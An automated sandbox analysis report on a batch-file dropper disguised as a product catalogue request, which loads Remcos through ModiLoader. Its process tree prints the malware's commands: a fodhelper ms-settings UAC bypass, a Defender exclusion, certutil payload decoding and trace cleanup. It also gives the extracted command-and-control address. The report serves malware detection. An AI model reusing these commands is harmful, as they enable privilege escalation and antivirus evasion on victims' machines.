Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04-04-2024 07:15
Static task
static1
Behavioral task
behavioral1
Sample
PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Resource
win10v2004-20240226-en
General
-
Target
PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
-
Size
4.4MB
-
MD5
a9f2c8cc828e683395e9a804c120021e
-
SHA1
6b1f7e910df1792b94690045d3de345cff297ff3
-
SHA256
c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1
-
SHA512
c0e6d23b0ba6bc4255938d8b14b563100068e25ab2d9c5e5e9632683c6b1bd28f8fc32b4f2b790400b66977b24f0ff574b2025a7fdee7e968c08d975ff1c227d
-
SSDEEP
49152:xOp5wZlcwP4QJpMoD8cGL2tojFdpjyPHKbfS4b0umx0TwKi3K6lflLE/B2t3mTss:0
Malware Config
Extracted
remcos
RemoteHost
192.3.216.139:44800
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-EP05ZF
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1700-58-0x0000000003F90000-0x0000000004F90000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xkn.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation xkn.exe -
Executes dropped EXE 16 IoCs
Processes:
alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exepid process 3928 alpha.exe 4232 alpha.exe 2980 alpha.exe 5052 xkn.exe 3668 alpha.exe 2664 alpha.exe 4280 kn.exe 1736 alpha.exe 4352 kn.exe 1700 Lewxa.com 4112 alpha.exe 4428 alpha.exe 872 alpha.exe 4116 alpha.exe 3648 alpha.exe 3292 alpha.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1460 taskkill.exe 4568 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings reg.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
xkn.exepid process 5052 xkn.exe 5052 xkn.exe 5052 xkn.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
xkn.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 5052 xkn.exe Token: SeDebugPrivilege 1460 taskkill.exe Token: SeDebugPrivilege 4568 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
Lewxa.compid process 1700 Lewxa.com -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Lewxa.compid process 1700 Lewxa.com -
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exealpha.exedescription pid process target process PID 2152 wrote to memory of 3732 2152 cmd.exe cmd.exe PID 2152 wrote to memory of 3732 2152 cmd.exe cmd.exe PID 3732 wrote to memory of 4552 3732 cmd.exe extrac32.exe PID 3732 wrote to memory of 4552 3732 cmd.exe extrac32.exe PID 2152 wrote to memory of 3928 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 3928 2152 cmd.exe alpha.exe PID 3928 wrote to memory of 2960 3928 alpha.exe extrac32.exe PID 3928 wrote to memory of 2960 3928 alpha.exe extrac32.exe PID 2152 wrote to memory of 4232 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 4232 2152 cmd.exe alpha.exe PID 4232 wrote to memory of 4872 4232 alpha.exe extrac32.exe PID 4232 wrote to memory of 4872 4232 alpha.exe extrac32.exe PID 2152 wrote to memory of 2980 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 2980 2152 cmd.exe alpha.exe PID 2980 wrote to memory of 5052 2980 alpha.exe xkn.exe PID 2980 wrote to memory of 5052 2980 alpha.exe xkn.exe PID 5052 wrote to memory of 3668 5052 xkn.exe alpha.exe PID 5052 wrote to memory of 3668 5052 xkn.exe alpha.exe PID 3668 wrote to memory of 540 3668 alpha.exe reg.exe PID 3668 wrote to memory of 540 3668 alpha.exe reg.exe PID 5052 wrote to memory of 2700 5052 xkn.exe fodhelper.exe PID 5052 wrote to memory of 2700 5052 xkn.exe fodhelper.exe PID 2152 wrote to memory of 2664 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 2664 2152 cmd.exe alpha.exe PID 2664 wrote to memory of 4280 2664 alpha.exe kn.exe PID 2664 wrote to memory of 4280 2664 alpha.exe kn.exe PID 2152 wrote to memory of 1736 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 1736 2152 cmd.exe alpha.exe PID 1736 wrote to memory of 4352 1736 alpha.exe kn.exe PID 1736 wrote to memory of 4352 1736 alpha.exe kn.exe PID 2152 wrote to memory of 1700 2152 cmd.exe Lewxa.com PID 2152 wrote to memory of 1700 2152 cmd.exe Lewxa.com PID 2152 wrote to memory of 1700 2152 cmd.exe Lewxa.com PID 2152 wrote to memory of 4112 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 4112 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 4428 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 4428 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 872 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 872 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 4116 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 4116 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 3648 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 3648 2152 cmd.exe alpha.exe PID 3648 wrote to memory of 1460 3648 alpha.exe taskkill.exe PID 3648 wrote to memory of 1460 3648 alpha.exe taskkill.exe PID 2152 wrote to memory of 3292 2152 cmd.exe alpha.exe PID 2152 wrote to memory of 3292 2152 cmd.exe alpha.exe PID 3292 wrote to memory of 4568 3292 alpha.exe taskkill.exe PID 3292 wrote to memory of 4568 3292 alpha.exe taskkill.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\fodhelper.exe"C:\Windows\system32\fodhelper.exe"4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3864 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbmrryv2.st4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Lewxa.txtFilesize
3.1MB
MD5aecbd8ff910c38b1772994a46cf4dcee
SHA196e1b7e276e7b19150c259a344e45b9fa04fac43
SHA256f29aff3e41afb8bdc6aeffbb4dc0f0083a7851a4fae1ef39a44bf72d7ede6c33
SHA5122919015e969612462b2d5b91e1bfa4ec92277f065628e3b5fc6126974203bd490ab89809f14951ac0a5e9d888dbde98af1ebb3900318fa6d718fd04e89d36d18
-
C:\Users\Public\Libraries\Lewxa.comFilesize
1.5MB
MD56babecb95e226aef5eef6f80111e04de
SHA1f2974245b3391f9be136fdf76df36cc5ad0bed2d
SHA256a561b2ad4fea4284042c99132d49d651f3d409cc41dc6e950dc85a16ae3934a0
SHA512109d9814b12c61c9579395317dc54a6a0092b3ec1b54d4eab9c3489ffe11971e977f8676f44886e46299bbbf49407e33e02642a0ec151144a3dc72b1a13e0949
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\xkn.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/1700-73-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-65-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-89-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-88-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-84-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-83-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-56-0x0000000000A30000-0x0000000000A31000-memory.dmpFilesize
4KB
-
memory/1700-57-0x0000000003F90000-0x0000000004F90000-memory.dmpFilesize
16.0MB
-
memory/1700-58-0x0000000003F90000-0x0000000004F90000-memory.dmpFilesize
16.0MB
-
memory/1700-60-0x0000000000400000-0x0000000000596000-memory.dmpFilesize
1.6MB
-
memory/1700-61-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-62-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-63-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-79-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-66-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-67-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-69-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-71-0x0000000000A30000-0x0000000000A31000-memory.dmpFilesize
4KB
-
memory/1700-78-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/1700-74-0x0000000016320000-0x0000000017320000-memory.dmpFilesize
16.0MB
-
memory/5052-22-0x000001E0A03A0000-0x000001E0A03C2000-memory.dmpFilesize
136KB
-
memory/5052-32-0x000001E086070000-0x000001E086080000-memory.dmpFilesize
64KB
-
memory/5052-27-0x00007FFE93670000-0x00007FFE94131000-memory.dmpFilesize
10.8MB
-
memory/5052-28-0x000001E086070000-0x000001E086080000-memory.dmpFilesize
64KB
-
memory/5052-29-0x000001E086070000-0x000001E086080000-memory.dmpFilesize
64KB
-
memory/5052-35-0x00007FFE93670000-0x00007FFE94131000-memory.dmpFilesize
10.8MB